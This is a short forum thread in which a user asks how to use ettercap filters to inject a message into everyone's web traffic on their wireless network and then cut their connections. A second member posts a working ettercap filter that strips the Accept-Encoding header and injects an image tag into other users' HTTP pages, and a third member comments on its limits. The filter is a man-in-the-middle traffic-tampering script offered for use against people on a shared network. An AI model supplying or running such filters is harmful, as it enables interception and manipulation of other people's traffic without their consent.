Results 1 to 4 of 4

Thread: can someone help me with ettercap

  1. #1
    Just burned his ISO
    Join Date
    Jul 2009
    Posts
    2

    Default can someone help me with ettercap

    Hi all

    I want some help if its possible

    Is it possible with the ettercap filter to give everybody in my wlan i sign like time to go to bed guys and with a little delay kill the connections?

    And if yes how would i do that?

    i found this:
    if (ip.proto == TCP && tcp.dst == 80) {
    if (search(DATA.data, "Accept-Encoding")) {
    replace("Accept-Encoding", "Accept-Rubbish!");
    # note: replacement string is same length as original string
    msg("zapped Accept-Encoding!\n");
    }
    }
    if (ip.proto == TCP && tcp.src == 80) {
    replace("img src=", "img src=\"time to go to bed" ");
    replace("IMG SRC=", "img src=\"time to go to bed" ");
    msg("Filter Ran.\n");
    }

    do i have to tweak on this to make it happen?

    thx

    and srry for my bad english

  2. #2
    Senior Member BigMac's Avatar
    Join Date
    Jan 2008
    Posts
    213

    Default

    ill go ahead and throw you a cookie... this filter will put what ever source you want at the top of each page...

    Code:
    if (ip.proto == TCP && tcp.dst == 80) {
        if (search(DATA.data, "Accept-Encoding")) {
               replace("Accept-Encoding", "Accept-Nothing!");
          }
    }
    
    if (ip.proto == TCP && tcp.src == 80) {
          if (search(DATA.data, "</title>")) {
               replace("</title>", "</title><img src="http://www.meandmyspace.com/files/en/comments1/good.night/bed_time.gif" />");
               msg("script injected");
          }}
    compile that and then launch ettercap...

  3. #3
    My life is this forum thorin's Avatar
    Join Date
    Jan 2010
    Posts
    2,629

    Default

    Quote Originally Posted by BigMac View Post
    ill go ahead and throw you a cookie... this filter will put what ever source you want at the top of each page...
    That assumes every HTML document contains a TITLE tag, which is not mandatory. Also you'd be changing the length of the payload so the checksums on the packets will be borked (though perhaps HTTP only cares if the headers are futzed...you'd have to read some RFCs to find out).

    PS > Yes I know "borked" and "futzed" aren't real words but I like them anyway
    I'm a compulsive post editor, you might wanna wait until my post has been online for 5-10 mins before quoting it as it will likely change.

    I know I seem harsh in some of my replies. SORRY! But if you're doing something illegal or posting something that seems to be obvious BS I'm going to call you on it.

  4. #4
    Senior Member BigMac's Avatar
    Join Date
    Jan 2008
    Posts
    213

    Default

    Quote Originally Posted by thorin View Post
    That assumes every HTML document contains a TITLE tag, which is not mandatory. Also you'd be changing the length of the payload so the checksums on the packets will be borked (though perhaps HTTP only cares if the headers are futzed...you'd have to read some RFCs to find out).

    PS > Yes I know "borked" and "futzed" aren't real words but I like them anyway
    if you got time to spare, find me a site that is not effected by this filter and ill also throw you a cookie lol

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •